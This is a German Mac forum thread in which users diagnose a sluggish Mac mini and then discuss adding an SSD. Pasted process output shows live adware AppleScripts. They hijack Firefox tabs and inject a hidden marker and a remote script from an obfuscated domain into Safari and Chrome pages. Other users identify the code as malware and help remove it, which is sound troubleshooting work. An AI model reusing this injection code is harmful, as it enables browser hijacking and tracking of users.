• Apfeltalk ändert einen Teil seiner Allgemeinen Geschäftsbedingungen (AGB), das Löschen von Useraccounts betreffend.
    Näheres könnt Ihr hier nachlesen: AGB-Änderung
  • Viele hassen ihn, manche schwören auf ihn, wir aber möchten unbedingt sehen, welche Bilder Ihr vor Eurem geistigen Auge bzw. vor der Linse Eures iPhone oder iPad sehen könnt, wenn Ihr dieses Wort hört oder lest. Macht mit und beteiligt Euch an unserem Frühjahrsputz ---> Klick

[Mac mini] Mac sehr träge - Arbeitspeicher?

Jangofat

Granny Smith
Registriert
12.10.16
Beiträge
14
Führe am Terminal "ps auxwww | grep osascript" aus, um herauszufinden, was da läuft.

Oh man, mit so was kenn ich mich ja mal so gar nicht aus :D
Jorgos-mini:~ Jorgo$ ps auxwww | grep osascript
Jorgo 1149 0,0 0,1 2506272 10876 ?? S Di06pm 0:20.85 /usr/bin/osascript -e global delayTime^M^Jset delayTime to 99999999^M^Jglobal newTabUrl^M^Jset newTabUrl to "'http://google.com'"^M^Jglobal currentUrl^M^Jset currentUrl to ""^M^Jglobal previousUrl^M^Jset previousUrl to ""^M^Jglobal newTabWithPrev^M^Jset newTabWithPrev to ""^M^J^M^Jrepeat^M^J«event XFdrIjct» {}^M^Jend repeat^M^J^M^Jon «event XFdrIjct» {}^M^Jdelay (delayTime * 60)^M^Jtry^M^Jif is_Firefox_running() then^M^Jtell application "Firefox" to activate^M^Jtell application "System Events"^M^Jkeystroke "l" using command down^M^Jkeystroke "c" using command down^M^Jdelay(1)^M^Jend tell^M^Jset currentUrl to the clipboard^M^J^M^Jif currentUrl is not equal to previousUrl then^M^Jset newTabUrlWithPrev to newTabUrl^M^Jset newTabUrlWithPrev to replace_chars(newTabUrlWithPrev, "[CONTEXT_URL]", currentUrl)^M^Jtell application "Firefox"^M^Jopen location newTabUrlWithPrev^M^Jend tell^M^Jset previousUrl to newTabUrlWithPrev^M^Jend if^M^Jend if^M^Jend try^M^Jend «event XFdrIjct»^M^J^M^Jon is_Firefox_running()^M^Jtell application "System Events" to (name of processes) contains "firefox"^M^Jend is_Firefox_running^M^J^M^Jon replace_chars(this_text, search_string, replacement_string)^M^Jset AppleScript's text item delimiters to the search_string^M^Jset the item_list to every text item of this_text^M^Jset AppleScript's text item delimiters to the replacement_string^M^Jset this_text to the item_list as string^M^Jset AppleScript's text item delimiters to ""^M^Jreturn this_text^M^Jend replace_chars
Jorgo 1147 0,0 0,3 2573892 21660 ?? S Di06pm 2:11.00 /usr/bin/osascript -e global _pid^M^Jset _pid to "A81824a7e058cd13d-0-NM-DE"^M^J^M^Jrepeat^M^J«event XFdrIjct» {} ^M^Jend repeat^M^J^M^J^M^Jon «event XFdrIjct» {}^M^Jdelay 0.5^M^Jtry^M^Jif is_Safari_running() then^M^Jtell application "Safari" ^M^Jtell application "Safari" to set page_source to do JavaScript "document.body.innerHTML;" in current tab of first window ^M^Jif page_source does not contain _pid then^M^Jset theURL to URL of current tab of first window^M^Jif theURL is not equal to "about:blank" then^M^Jtell application "Safari" to do JavaScript "document.body.innerHTML='<div style=\"display:none;\">" & _pid & "</div>'+document.body.innerHTML;" in current tab of first window ^M^Jtell application "Safari" to do JavaScript "var js_script = document.createElement('script'); js_script.type = \"text/javascript\"; js_script.src = \"//aa51ed0a34de824dbcbba733089c456689.com/sm/mu?id=D61457E3-B587-552B-9D2C-EE00C6DD4B75&d=A81824a7e058cd13d-0-NM-DE&cl=0\"; document.getElementsByTagName('head')[0].appendChild(js_script);" in current tab of first window^M^Jend if ^M^Jend if^M^Jend tell^M^Jend if^M^Jend try^M^Jend «event XFdrIjct»^M^J^M^Jon is_Safari_running() ^M^Jtell application "System Events" to (name of processes) contains "Safari"^M^Jend is_Safari_running
Jorgo 87240 0,0 0,0 2444056 812 s000 S+ 4:54pm 0:00.00 grep osascript
Jorgo 87238 0,0 0,1 2503604 10664 ?? R 4:54pm 0:00.04 /usr/bin/osascript -e global _pid^M^Jset _pid to "A81824a7e058cd13d-0-NM-DE" ^M^Jrepeat^M^J«event XFdrIjct» {}^M^Jend repeat^M^J^M^Jon «event XFdrIjct» {} ^M^Jdelay 0.5^M^Jtry^M^Jif is_Chrome_running() then^M^Jtell application "Google Chrome" to tell active tab of window 1^M^Jset sourceHtml to execute javascript "document.getElementsByTagName('html')[0].innerHTML"^M^Jif sourceHtml does not contain _pid then^M^Jtell application "Google Chrome" to execute front window's active tab javascript "document.body.innerHTML='<div style=\"display:none;\">" & _pid & "</div>'+document.body.innerHTML;" ^M^Jtell application "Google Chrome" to execute front window's active tab javascript "var js_script = document.createElement('script'); js_script.type = \"text/javascript\"; js_script.src = \"//aa51ed0a34de824dbcbba733089c456689.com/sm/mu?id=D61457E3-B587-552B-9D2C-EE00C6DD4B75&d=A81824a7e058cd13d-0-NM-DE&cl=0\"; document.getElementsByTagName('head')[0].appendChild(js_script);"^M^Jend if^M^Jend tell^M^Jend if^M^Jend try^M^Jend «event XFdrIjct»^M^J^M^Jon is_Chrome_running() ^M^Jtell application "System Events" to (name of processes) contains "Google Chrome"^M^Jend is_Chrome_running
 

ottomane

Golden Noble
Registriert
24.08.12
Beiträge
16.384
Uff. Meiner Einschätzung nach ist das bösartiger Code, vermutlich weitere AdWare, kann aber auch schlimmerer Dreck sein, z.B. ein Keylogger.

Es wird in Browsertabs von Firefox, Chrome und Safari von zwielichtigen Servern (z.B. von http://aa51ed0a34de824dbcbba733089c456689.com) JavaScript-Code in andere Seiten injiziert und dort z.B. getrackt, was du so im Browser treibst.

Dieser Code verursacht 30 % CPU-Last auf deinem System im Moment des Etrechecks.

Kein Wunder, dass dein Mac lahm ist.

Jetzt fragst du, wie du das wegbekommst. Leider kann ich nicht sehen, was den Mist startet.

Ich würde die zuvor genannten Dinge unbekannter Herkunft entfernen.

JavaPlugin auch entfernen oder deaktivieren.

Flash updaten oder löschen, falls du es nicht brauchst.
 
  • Like
Reaktionen: maddi06

ottomane

Golden Noble
Registriert
24.08.12
Beiträge
16.384
Es gibt im Forum einige Leute, die sich wirklich gut auskennen. Ich könnte mir vorstellen, dass da jemand zielgerichtetere Tipps geben kann als ich. Außerdem sieht das da oben ziemlich interessant aus ;)

Vielleicht ist @Rastafari in der Nähe? Oder @Marcel Bresink ? Oder jemand anders, der zu diesem Fall was sagen kann?
 

Jangofat

Granny Smith
Registriert
12.10.16
Beiträge
14
So wie ich das bisher einschätzen kann läuft alles flüssiger.
EtreCheck sagt "excellent performance" und es wird keine Malware gefunden.
Ich hoffe echt das bleibt so.
Ich werde das mal weiter beobachten. Kann ja dann noch mal berichten ob sich das Problem endgültig gelöst hat.
Auf jeden Fall vielen Dank an euch alle!!!
 

maddi06

Borowitzky
Registriert
10.11.14
Beiträge
9.027
Ich würde mal sagen das wars. :) Dein Mac sollte jetzt auf jeden Fall wieder flüssiger laufen.
 

ottomane

Golden Noble
Registriert
24.08.12
Beiträge
16.384
Führe am Terminal "ps auxwww | grep osascript" aus, um herauszufinden, was da läuft.

Mache das noch einmal zur Sicherheit ;)

Ansonsten: Schön, dass es geholfen hat und danke für die Rückmeldung.

Ich hoffe echt das bleibt so.

Und achte darauf, woher du deine Software lädtst. Einige Adware wird normaler Software beigepackt, wenn man sie bei Softwareportalen statt beim Hersteller oder im Store herunterlädt.

Von selbst installiert sich der Dreck nicht... :)
 
Zuletzt bearbeitet von einem Moderator:
  • Like
Reaktionen: jazz

jazz

Thurgauer Weinapfel
Registriert
15.03.05
Beiträge
1.008
Mal eine Frage an die Experten: wäre es nicht besser er macht ein Backup und löscht dann die ganze Festplatte,
um dann nach einer Neuinstallation des OS mittels "Time Machine öffnen" das Backup wieder einspielt? Die Programme dabei aber neu installiert.
 

jazz

Thurgauer Weinapfel
Registriert
15.03.05
Beiträge
1.008
  • Like
Reaktionen: mister apple

Jangofat

Granny Smith
Registriert
12.10.16
Beiträge
14
Dann empfehle ich Dir:

https://de.ifixit.com/Device/Mac_Mini_Mid_2011

In Deinem Mac Mini 2011 kannst Du offenbar eine SSD neben der schon vorhandenen FP einbauen.

Auf die Möglichkeit mit der 2. internen Platte war ich inzwischen auch gestoßen. Da gibt es Kits von verschiedenen Anbietern ...
von günstig
https://www.amazon.de/Zweite-Festpl...1&sr=8-3-fkmr3&keywords=owc+kit+mac+mini+2011
bis teuer
https://eshop.macsales.com/item/OWC/DIDIMM11D2/?customer-reviews&ratings.page=3
Bin nicht sicher ob es da qualitative Unterschiede gibt?
Und dazu die Samsung 750 Evo 250GB SATA 6Gb/s
 
  • Like
Reaktionen: jazz

jazz

Thurgauer Weinapfel
Registriert
15.03.05
Beiträge
1.008
Die günstigere Lösung hat sogar noch das Werkzeug dabei:) Und verbunden mit dem Kauf von der SSD sparst Du Dir die Versandkosten.
Ja, ja, ich bin ehrenamtlicher (Beckenbauer) Berater von A.....;););)
 
  • Like
Reaktionen: mister apple